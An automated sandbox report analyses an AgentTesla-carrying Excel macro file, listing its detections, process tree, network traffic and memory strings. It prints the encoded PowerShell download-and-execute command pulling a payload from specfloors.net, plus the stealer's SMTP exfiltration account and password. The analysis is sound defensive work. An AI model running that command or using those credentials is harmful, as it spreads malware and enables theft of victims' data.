Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report MV TRIADES.xlsm

Overview

General Information

Sample Name:MV TRIADES.xlsm
Analysis ID:372951
MD5:f7f66672f19f2dabe4f7269e32eb8540
SHA1:688ba6fb074142755fecd74056278b145a282f5a
SHA256:9664740123170b912430759af6cfad9ff784ccd266fe93909022093beff051c7
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected AgentTesla
Yara detected Powershell download and execute
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2360 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2028 cmdline: cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1320 cmdline: powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • tNDFx.exe (PID: 2288 cmdline: 'C:\Users\user\AppData\Roaming\tNDFx.exe' MD5: B2AB5D8639C89D42ACBDC362B86ACA91)
          • cmd.exe (PID: 2760 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)
            • timeout.exe (PID: 2916 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
          • tNDFx.exe (PID: 824 cmdline: C:\Users\user\AppData\Roaming\tNDFx.exe MD5: B2AB5D8639C89D42ACBDC362B86ACA91)
          • tNDFx.exe (PID: 2484 cmdline: C:\Users\user\AppData\Roaming\tNDFx.exe MD5: B2AB5D8639C89D42ACBDC362B86ACA91)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "mail@jiratane.comOlaola123@smtp.jiratane.comroot@jiratane.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.tNDFx.exe.6a8f2b8.17.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              6.2.tNDFx.exe.6ac52d8.16.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                11.2.tNDFx.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  6.2.tNDFx.exe.6ac52d8.16.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    6.2.tNDFx.exe.6a8f2b8.17.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA, CommandLine: cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2360, ProcessCommandLine: cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA, ProcessId: 2028

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-Avira URL Cloud: Label: malware
                      Source: http://specfloors.net/dev/incomeAvira URL Cloud: Label: malware
                      Source: http://specfloors.net/dev/income.exeAvira URL Cloud: Label: malware
                      Source: http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.htmlAvira URL Cloud: Label: malware
                      Source: http://specfloors.net/dev/income.exePEAvira URL Cloud: Label: malware
                      Source: http://liverpoolsupporters9.comAvira URL Cloud: Label: malware
                      Source: http://specfloors.netAvira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 6.2.tNDFx.exe.6a8f2b8.17.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "mail@jiratane.comOlaola123@smtp.jiratane.comroot@jiratane.com"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeReversingLabs: Detection: 27%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: MV TRIADES.xlsmVirustotal: Detection: 44%Perma Link
                      Source: MV TRIADES.xlsmReversingLabs: Detection: 42%
                      Machine Learning detection for sampleShow sources
                      Source: MV TRIADES.xlsmJoe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: (PinLC:\Windows\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: Npdbsic.pdb source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.exe-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4tNDFx.PDB424491E3931}\Servererver32 source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: bc.pdbCESSO source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.exeualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmp
                      Source: Binary string: @micC:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbx source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp
                      Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdbX source: tNDFx.exe, 00000006.00000002.2134101883.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: @nptnVisualBasic.pdb\ source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2109637901.0000000002AB0000.00000002.00000001.sdmp
                      Source: Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

                      Software Vulnerabilities:

                      barindex
                      Document exploit detected (process start blacklist hit)Show sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                      Source: global trafficDNS query: name: specfloors.net
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.180.99.252:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.180.99.252:80
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.116.63:587
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 22 Mar 2021 14:36:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 22 Mar 2021 11:02:01 GMTETag: "1e1614-11068-5be1dfec2aa31"Accept-Ranges: bytesContent-Length: 69736Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9d 4e b7 9f 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 f2 00 00 00 08 00 00 00 00 00 00 4e 11 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 c4 f6 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 11 01 00 4b 00 00 00 00 20 01 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 fc 00 00 68 14 00 00 00 40 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 f1 00 00 00 20 00 00 00 f2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 11 01 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 73 00 00 5c 9d 00 00 03 00 00 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 22 02 28 08 00 00 0a 00 2a 52 02 28 08 00 00 0a 00 00 02 73 09 00 00 0a 7d 02 00 00 04 2a 36 00 28 7e 00 00 06 6f 25 00 00 0a 00 2a 3e 00 02 72 c6 4c 00 70 03 6f 30 00 00 0a 00 2a 22 02 28 31 00 00 0a 00 2a 56 73 81 00 00 06 28 32 00 00 0a 74 05 00 00 02 80 03 00 00 04 2a 7e 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a c6 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a ae 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a de 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a f6 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01
                      Source: global trafficHTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolsupporters9.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 172.67.176.78 172.67.176.78
                      Source: Joe Sandbox ViewIP Address: 198.54.116.63 198.54.116.63
                      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.116.63:587
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\625B6235.jpgJump to behavior
                      Source: global trafficHTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolsupporters9.comConnection: Keep-Alive
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: specfloors.net
                      Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129265159.0000000000B2A000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://crl3.dJ
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: tNDFx.exe, 00000006.00000002.2129265159.0000000000B2A000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: tNDFx.exe, 00000006.00000003.2110396652.00000000056D1000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpString found in binary or memory: http://jEOkvI.com
                      Source: tNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://liverpoolsupporters9.com
                      Source: tNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://ocsp.digicert.com0O
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000004.00000002.2105102393.00000000024C0000.00000002.00000001.sdmp, tNDFx.exe, 00000006.00000002.2133629732.0000000005190000.00000002.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2353416224.0000000005DC0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: tNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: tNDFx.exe, 00000006.00000002.2134297073.0000000005E20000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: tNDFx.exe, 0000000B.00000002.2351747321.00000000022D6000.00000004.00000001.sdmpString found in binary or memory: http://smtp.jiratane.com
                      Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://specfloors.net
                      Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://specfloors.net/dev/income
                      Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2115696478.000000001B4A6000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2109712096.0000000002BD1000.00000004.00000001.sdmpString found in binary or memory: http://specfloors.net/dev/income.exe
                      Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://specfloors.net/dev/income.exePE
                      Source: powershell.exe, 00000004.00000002.2105102393.00000000024C0000.00000002.00000001.sdmp, tNDFx.exe, 00000006.00000002.2133629732.0000000005190000.00000002.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2353416224.0000000005DC0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
